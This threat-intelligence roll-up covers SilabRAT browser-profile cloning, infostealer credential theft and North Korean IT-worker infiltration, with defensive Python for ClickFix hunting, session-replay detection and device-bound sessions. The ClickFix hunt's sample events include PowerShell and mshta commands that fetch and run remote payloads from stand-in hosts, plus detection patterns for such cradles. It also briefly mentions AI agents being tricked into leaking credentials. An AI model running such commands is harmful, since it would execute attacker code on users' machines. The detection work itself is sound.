It's been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there's a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real credentials. The bigger problem is how polished this all looks now. Mule networks run like SaaS.
# Morning News Roll-up June 11, 2026
## Overview
This week's threat landscape highlights a shift toward highly polished, "as-a-service" cybercrime models. Key developments include the massive scale of infostealer-driven identity theft, the emergence of advanced browser-cloning RATs, and the dominance of North Korean infiltration campaigns targeting the technology sector.
## Top Stories
### MaaS RAT "SilabRAT" Targets Financial Credentials via Browser Cloning
- Summary: A new Remote Access Trojan (RAT) named SilabRAT is being sold as a service for $5,000 per month. It reaches victims through "ClickFix" lures that drop Hijack Loader, then harvests credentials from the infected host. Its most notable feature is Browser Profile Cloning: it copies the victim's entire browser state (cookies, extensions and local storage) so that the attacker's browser presents the victim's fingerprint and inherits already-authenticated sessions, defeating device-fingerprint and session-based checks.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#maas-rat-targets-credentials
### Infostealer Ecosystem Fuels 3.3 Billion Record Exposure
- Summary: Flashpoint research reveals that over 11.1 million devices were infected by infostealers in the past year. The harvest, 3.3 billion stolen credentials and session tokens, now circulates on illicit markets and comes from at least 30 distinct malware families, Lumma and Rhadamanthys among them.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#3-3b-identity-records-exposed
### North Korean "Famous Chollima" Dominates Tech Sector Intrusions
- Summary: CrowdStrike reports that the North Korean actor Famous Chollima is responsible for about 47%, nearly half, of all state-sponsored "hands-on-keyboard" intrusions against the tech industry. The campaigns rely on fraudulent remote IT workers who obtain legitimate employment and, with it, insider access to corporate networks.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#47-of-tech-intrusions
---
# SilabRAT & Identity-Based Malware-as-a-Service
Advanced financial-theft campaigns utilizing sophisticated remote access tools and widespread infostealer deployment.
## Key Points
- **Sophisticated Tooling**: SilabRAT features Hidden Virtual Network Computing (HVNC), which gives the operator a remote desktop session on a hidden desktop the victim never sees, and **Browser Profile Cloning**.
- **Commercialization**: The malware is sold as a premium service for $5,000 per month, reflecting a professionalized "SaaS" model for cybercrime.
- **Scale of Theft**: Use of infostealers (Lumma, StealC, etc.) has resulted in billions of leaked session cookies and cloud tokens. These are more valuable than passwords because a stolen cookie or token resumes an already-authenticated session, so the MFA challenge that protected the login is never presented to the attacker.
- **AI & Deepfakes**: Emerging threats include AI agents being tricked into leaking credentials and deepfake KYC (Know Your Customer) bypasses sold as features.
## Threat Actors
- **o1oo1**: A Russian-speaking developer and vendor active since 2020; previously associated with AsmCrypt.
- **Famous Chollima**: North Korean group focused on tech sector infiltration and fraudulent employment.
- **Infostealer Operators**: High activity noted in India, Brazil, Indonesia, and the U.S.
## TTPs
- **Browser Profile Cloning**: Copying cookies, user agents, extensions and local storage so the attacker's browser presents the victim's device fingerprint and carries the victim's live sessions.
- **ClickFix Campaigns**: Deceptive prompts (e.g., "Fix your browser") used to deliver Hijack Loader.
- **Hands-on-Keyboard**: Manual interaction with victim systems once initial access is gained.
- **EDR Weakening**: Abusing built-in OS settings, which an attacker holding administrative rights can change without any exploit, to switch off or weaken endpoint protection.
- **Mule Networks**: Organized money laundering operations running with SaaS-like efficiency.
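The ClickFix delivery chain above shows up in endpoint telemetry in a recognisable shape: the lure has the user paste a command into the Win+R box or a terminal, so the first stage starts as a child of explorer.exe with a one-liner that fetches and runs remote content. The following hunt is an added example for this roll-up, not code from the report or from any vendor. The event schema, field names and sample events are constructed, and the command-line patterns are common hallmarks of these lures rather than an exhaustive signature set; it also scores encoded or download-cradle commands under non-interactive parents at lower confidence, which goes beyond the ClickFix case itself.

```python
"""Hunt for ClickFix-style execution in process-creation telemetry.

Added example, not code from the report or any vendor. The event schema,
sample lines and the parent-process heuristic are this example's own
assumptions; the patterns are common ClickFix hallmarks, not a full ruleset.
"""
import json
import re

# Constructed process-creation events, one JSON object per line (loosely
# modelled on the fields an EDR or Sysmon Event ID 1 provides).
SAMPLE_EVENTS = """
{"pid":4120,"image":"powershell.exe","parent":"explorer.exe","cmd":"powershell -w hidden -c iex (iwr 'http://files.example.invalid/fix.ps1')"}
{"pid":4133,"image":"mshta.exe","parent":"explorer.exe","cmd":"mshta http://cdn.example.invalid/verify.hta"}
{"pid":4150,"image":"powershell.exe","parent":"services.exe","cmd":"powershell -NoProfile -File C:/ProgramData/Inventory/collect.ps1"}
{"pid":4162,"image":"chrome.exe","parent":"explorer.exe","cmd":"chrome.exe --profile-directory=Default"}
{"pid":4171,"image":"cmd.exe","parent":"explorer.exe","cmd":"cmd /c ipconfig /all"}
{"pid":4188,"image":"powershell.exe","parent":"svchost.exe","cmd":"powershell -enc SQBuAHYAbwBrAGUALQBJAHQAZQBtACAAQwA6AFwAVABlAG0AcAA="}
"""

# Interpreters and living-off-the-land binaries a pasted one-liner lands in.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# Win+R and desktop launches are children of the shell; scheduled tasks,
# services and software deployment are not.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits of a stage-one cradle: fetch remote content, evaluate
# it, hide the window, or carry the whole payload base64-encoded.
PATTERNS = {
    "remote_fetch": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
}


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines()]


def classify(event):
    """Return (confidence, reasons) for one event, or None when it is benign.

    A cradle launched straight from the shell is 'high'; the same command line
    under a service or task host is 'medium' (could be admin tooling).
    """
    if event["image"].lower() not in LOLBINS:
        return None
    reasons = [name for name, rx in PATTERNS.items() if rx.search(event["cmd"])]
    if not reasons:
        return None
    interactive = event["parent"].lower() in INTERACTIVE_PARENTS
    return ("high" if interactive else "medium", reasons)


def find_clickfix(events):
    alerts = []
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        confidence, reasons = hit
        alerts.append({"pid": ev["pid"], "image": ev["image"], "parent": ev["parent"],
                       "confidence": confidence, "reasons": reasons})
    return alerts


def run_sample():
    return find_clickfix(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f'[{a["confidence"]:6}] pid={a["pid"]} {a["parent"]} -> {a["image"]}: '
              + ", ".join(a["reasons"]))
```

On the constructed sample this flags the two explorer.exe children (PowerShell download cradle, mshta pulling an HTA) at high confidence and the encoded PowerShell under svchost.exe at medium; the signed inventory script, the browser launch and the plain ipconfig are left alone. In a real environment the parent check needs the terminal emulators and the Run dialog host in use, and the medium tier is where admin automation generates the tuning work.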
## Affected Systems
- **Web Browsers**: Specifically targeted for profile cloning and credential extraction.
- **Cryptocurrency Wallets**: Identification of wallet addresses and artifact extraction.
- **Technology Companies**: Primary targets for North Korean infiltration and IT worker fraud.
- **Identity Platforms**: Massive exposure of session cookies and cloud identity tokens.
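A cloned profile is built to pass exactly the device-fingerprint checks an identity platform or web tier relies on, so the signal that survives is where the session is used from, not what browser it claims to be. The detector below is an added example for this roll-up, not code from the report or from any vendor. The log schema (session id, client IP, ASN, country and User-Agent per request) and every sample line are constructed; in production those fields come from the load balancer and an IP-intelligence lookup. It also reports replays where the User-Agent changed, which covers plain cookie theft without cloning.

```python
"""Flag a session cookie used from a new network shortly after its origin.

Added example, not code from the report or any vendor. The log schema and
all sample lines are constructed; the two-hour window is an assumption.
"""
import json
from datetime import datetime, timedelta

# Constructed web-tier access records, one JSON object per line.
SAMPLE_LOG = """
{"ts":"2026-06-10T08:00:00Z","sid":"s-2b44","ip":"192.0.2.40","asn":"AS64520","cc":"US","ua":"Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0","path":"/account"}
{"ts":"2026-06-10T09:00:12Z","sid":"s-7f3a","ip":"203.0.113.10","asn":"AS64500","cc":"DE","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0","path":"/account"}
{"ts":"2026-06-10T09:04:40Z","sid":"s-7f3a","ip":"203.0.113.10","asn":"AS64500","cc":"DE","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0","path":"/transfer"}
{"ts":"2026-06-10T09:21:03Z","sid":"s-7f3a","ip":"198.51.100.77","asn":"AS64510","cc":"BR","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0","path":"/account/settings"}
{"ts":"2026-06-10T09:22:15Z","sid":"s-7f3a","ip":"198.51.100.77","asn":"AS64510","cc":"BR","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0","path":"/payees/add"}
{"ts":"2026-06-10T10:00:00Z","sid":"s-9c1e","ip":"192.0.2.5","asn":"AS64520","cc":"US","ua":"Mozilla/5.0 (Macintosh) Safari/17.4","path":"/account"}
{"ts":"2026-06-10T11:30:00Z","sid":"s-2b44","ip":"198.51.100.9","asn":"AS64530","cc":"GB","ua":"Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0","path":"/account"}
{"ts":"2026-06-10T12:30:00Z","sid":"s-9c1e","ip":"192.0.2.88","asn":"AS64520","cc":"US","ua":"Mozilla/5.0 (Macintosh) Safari/17.4","path":"/account"}
"""


def parse_log(text):
    events = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    events.sort(key=lambda r: r["ts"])
    return events


def find_replayed_sessions(events, window=timedelta(hours=2)):
    """Alert once per (session, new ASN) when a session is used from a
    different ASN or country within `window` of its first request.

    The User-Agent is reported but never used to suppress an alert: a cloned
    profile reproduces it exactly, so an unchanged fingerprint is not evidence
    that the same device is behind the request.
    """
    origin = {}   # sid -> first request seen for that session
    seen = set()  # (sid, asn) pairs already alerted, to avoid one alert per request
    alerts = []
    for rec in events:
        sid = rec["sid"]
        base = origin.setdefault(sid, rec)
        if base is rec:
            continue
        moved = rec["asn"] != base["asn"] or rec["cc"] != base["cc"]
        if not moved or (rec["ts"] - base["ts"]) > window:
            continue
        if (sid, rec["asn"]) in seen:
            continue
        seen.add((sid, rec["asn"]))
        alerts.append({
            "sid": sid,
            "origin": f'{base["asn"]}/{base["cc"]}/{base["ip"]}',
            "replay": f'{rec["asn"]}/{rec["cc"]}/{rec["ip"]}',
            "same_fingerprint": rec["ua"] == base["ua"],
            "minutes_after_origin": int((rec["ts"] - base["ts"]).total_seconds() // 60),
            "path": rec["path"],
        })
    return alerts


if __name__ == "__main__":
    for a in find_replayed_sessions(parse_log(SAMPLE_LOG)):
        print(a)
```

On the sample, session s-7f3a opened from a German network and twenty minutes later starts changing settings and adding payees from a Brazilian one with an identical User-Agent: one alert, not two, because the second Brazilian request is deduplicated. The session that changes IP inside the same ASN and the one that reappears abroad three and a half hours later are not flagged; the window and the ASN-versus-country granularity are the knobs to tune against your own population of mobile and VPN users.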
## Mitigations
- **Hardware-Backed MFA and Session Binding**: Move away from SMS or app-based codes toward FIDO2/WebAuthn to stop credential phishing. Note that this alone does not defeat session cookie theft: a cookie stolen after login replays without any MFA challenge. Counter that with short session lifetimes, re-authentication for sensitive actions, and device-bound session credentials that tie the cookie to a key the malware cannot export.
- **Identity Verification**: Enhanced background checks for remote IT hires to counter North Korean infiltration.
- **Endpoint Hardening**: Restrict administrative rights to prevent the "quiet weakening" of security tools via OS settings and, where the EDR supports it, enable tamper protection so its settings can only be changed from the management console.
- **Endpoint and Identity Monitoring**: Alert on non-browser processes reading browser credential and cookie stores, on bulk export of profile data, and on session cookies reused from a new network or ASN while presenting an unchanged browser fingerprint.
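The difference between a bearer cookie and a device-bound session is easiest to see in code. The demo below is an added example for this roll-up, not code from the report or from any product. The handshake, token format and per-device key are this example's own assumptions: the proof is an HMAC over a server-issued nonce so that it runs on the standard library alone, whereas real designs (WebAuthn re-authentication, Device Bound Session Credentials) sign the nonce with an asymmetric key held in a TPM or secure enclave that an infostealer cannot copy out of the profile.

```python
"""Bearer cookie versus device-bound session, side by side.

Added example, not code from the report or any product. The HMAC proof and
the nonce handshake stand in for a hardware-held asymmetric key.
"""
import hashlib
import hmac
import secrets


class Device:
    """A browser on one machine. The key stands in for a non-exportable
    hardware key; an infostealer that copies the profile does not get it."""

    def __init__(self):
        self.key = secrets.token_bytes(32)

    def prove(self, nonce: bytes) -> bytes:
        return hmac.new(self.key, nonce, hashlib.sha256).digest()


class BearerSessionServer:
    """Common design today: after login (FIDO2 or otherwise) the server hands
    out a cookie, and whoever presents that cookie is the user."""

    def __init__(self):
        self.sessions = {}  # sid -> user

    def login(self, user: str) -> str:
        sid = secrets.token_hex(16)
        self.sessions[sid] = user
        return sid

    def authorize(self, sid: str):
        return self.sessions.get(sid)


class BoundSessionServer:
    """The cookie names the session; each sensitive request must also carry a
    fresh proof that the caller holds the device key registered at login."""

    def __init__(self):
        self.sessions = {}  # sid -> (user, device key registered at login)
        self.nonces = {}    # sid -> outstanding single-use challenge

    def login(self, user: str, device_key: bytes) -> str:
        sid = secrets.token_hex(16)
        self.sessions[sid] = (user, device_key)
        return sid

    def challenge(self, sid: str) -> bytes:
        nonce = secrets.token_bytes(16)
        self.nonces[sid] = nonce
        return nonce

    def authorize(self, sid: str, proof: bytes):
        entry = self.sessions.get(sid)
        nonce = self.nonces.pop(sid, None)  # single use: a captured proof cannot be replayed
        if entry is None or nonce is None:
            return None
        user, key = entry
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return user if hmac.compare_digest(expected, proof) else None


def demo() -> dict:
    victim, attacker = Device(), Device()

    # 1. Bearer cookie: the infostealer copies the cookie jar and the cloned
    #    profile on the attacker's machine is indistinguishable from the victim.
    srv = BearerSessionServer()
    cookie = srv.login("alice")
    bearer_replay = srv.authorize(cookie) == "alice"

    # 2. Bound session: the same theft yields the cookie but not the key.
    bsrv = BoundSessionServer()
    bcookie = bsrv.login("alice", victim.key)
    legit = bsrv.authorize(bcookie, victim.prove(bsrv.challenge(bcookie))) == "alice"
    wrong_key = bsrv.authorize(bcookie, attacker.prove(bsrv.challenge(bcookie)))

    # 3. A proof captured off the wire is useless once its nonce is spent.
    captured = victim.prove(bsrv.challenge(bcookie))
    bsrv.authorize(bcookie, captured)
    replayed_proof = bsrv.authorize(bcookie, captured)

    return {
        "bearer_cookie_replay_accepted": bearer_replay,
        "bound_session_legit_accepted": legit,
        "bound_session_stolen_cookie_accepted": wrong_key == "alice",
        "bound_session_captured_proof_accepted": replayed_proof == "alice",
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {accepted}")
```

The first result is the point the mitigation list makes: with a bearer cookie the stolen session is accepted outright, and nothing about the login method changes that. The bound variant rejects the stolen cookie because the attacker cannot produce a proof, and rejects a recorded proof because each nonce is consumed on use. The cost is a round trip per protected request and a registration step at login, which is why real deployments scope the proof to sensitive endpoints rather than every page load.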
## Conclusion
The threat landscape has evolved into a highly polished ecosystem where identity—not just the password—is the primary target. The prevalence of "MaaS" indicates that even mid-tier attackers now have access to elite-level tools capable of cloning entire browser environments. Organizations must shift focus toward securing the identity lifecycle and hardening endpoint configurations against manual tampering.